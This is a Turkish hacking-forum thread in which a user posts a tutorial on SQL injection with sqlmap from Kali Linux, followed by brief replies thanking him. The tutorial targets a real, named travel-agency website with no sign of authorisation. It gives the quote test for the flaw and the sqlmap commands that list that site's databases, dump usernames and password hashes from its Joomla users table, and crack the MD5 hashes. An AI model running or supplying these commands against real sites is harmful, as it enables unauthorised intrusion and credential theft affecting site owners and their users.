THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Linux Üzerinden SQLMAP ile SQL İnjection//Stajyer

RufSkynoN - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2016
Nereden:
Vatan'
Mesajlar:
2.217
Konular:
227
Teşekkür (Etti):
630
Teşekkür (Aldı):
434
Ticaret:
(0) %
05-02-2017 13:19
#1
Linux Üzerinden SQLMAP ile SQL İnjection//Stajyer
Kali Linux Üzerinden SQLMAP İle SQL İnjection Hack



Sql Açıklı Site Bulma


Kod:
http://www.buttercuptravel.co.th/news.php?id=20
Yukarda verdiğim sitede görüyorsunuz sonda "new.php?is=20" var bunun sonuna tırnak ekliyoruz

Kod:
http://www.buttercuptravel.co.th/news.php?id=20'
Bunu açtığımızda şu hatayı verirse sql açık vardır.

Kod:
Fatal error: Call to a member function fetch_assoc() on a non-object in /home/seaofstories/webapps/htdocs/title.php on line 34

Sqlmap İle Veritabanı Çekme

Veritabanı çekmek için şu kodu kullanacaz.

Kod:
sqlmap  -u http://hedefsite.com/sqlinjectionaciklibolum?id= --dbs
Yani şöyle

Kod:
sqlmap -u http://www.buttercuptravel.co.th/news.php?id=20 --dbs

Şimdi işleme geçelim uçbirime kodumuzu yazalım ENTER tuşuna basalım



Herhangi bir Yes/No sorusu gelirse Yes diyin bende demedi bende 3 adet veritabanı tespit etti.




Veritabanı Tablolarını Çekme

Tabloları çekmek için.

Kod:
sqlmap -u http://hedefurl.com -D veritabanı adı --tables
Yani şöyle.

Kod:
sqlmap -u http://www.buttercuptravel.co.th/news.php?id=20 -D buttercupt_jml7 --tables
Bizim ilkiyle işimiz var bu yüzden aşağıdaki gibi yazıp enterlıyoruz.



İşlem bittiğinde bize tablo isimleri verecektir bize lazım olanları alacağız genellikle "user/admin/adminastor" gibi yerlerde olur.Yani şöyle.




Veritabanı Tablolarınının Kolonlarını Çekme

Kod:
sqlmap -u http://hedefurl.com -D Veritabanı_Adı -T Tablo_Adı --columns
Yani söyle.

Kod:
sqlmap -u http://www.buttercuptravel.co.th/news.php?id=20 -D buttercupt_jml7 -T jos_users --columns
Bu şekilde yazıp enterlıyoruz.



İşlem bittikten sonra böyle görünecek.




Kolonlardaki Verileri Çekme

Kolonları çekmek için kodumuz.

Kod:
sqlmap -u http://hedefurl.com -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump
Yani şöyle.Ben ilk olarak usernameyi çektim.

Kod:
sqlmap -u http://www.buttercuptravel.co.th/news.php?id=20 -D buttercupt_jml7 -T jos_users -C username --dump


Evet işlem bittiğinde böyle tablo içinde gelecek.



Aynı işlemi password için yapalım.



İşlem bittiğinde böyle olacak.




Yes mi? No mu? diye sormuş burda şunu demek istiyor md5 ile gizlenmiş olan şifreyi kırmak istermisiniz istiyorsanız yes değin sonra enterlıyp kendi otamatik yapacaktır.


Video



Bütün anlatım bana iattir.Video ve resimler izinsiz alınamaz.
---------------------
Eski Dergici
MyGf Teşekkür etti.
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.284
Konular:
315
Teşekkür (Etti):
513
Teşekkür (Aldı):
1294
Ticaret:
(0) %
05-02-2017 13:22
#2
Elinize sağlıl hocam.
RufSkynoN - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2016
Nereden:
Vatan'
Mesajlar:
2.217
Konular:
227
Teşekkür (Etti):
630
Teşekkür (Aldı):
434
Ticaret:
(0) %
05-02-2017 13:23
#3
Alıntı:
MyGf´isimli üyeden Alıntı Mesajı göster
Elinize sağlıl hocam.
Teşekkür ederim...
---------------------
Eski Dergici
Leopic - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2016
Mesajlar:
9.946
Konular:
2066
Teşekkür (Etti):
28
Teşekkür (Aldı):
4337
Ticaret:
(0) %
05-02-2017 13:23
#4
Eline sağlık dostum (:
RufSkynoN - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2016
Nereden:
Vatan'
Mesajlar:
2.217
Konular:
227
Teşekkür (Etti):
630
Teşekkür (Aldı):
434
Ticaret:
(0) %
05-02-2017 13:24
#5
Alıntı:
Leopic´isimli üyeden Alıntı Mesajı göster
Eline sağlık dostum (:
Teşekkür ederim hocam...
---------------------
Eski Dergici

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler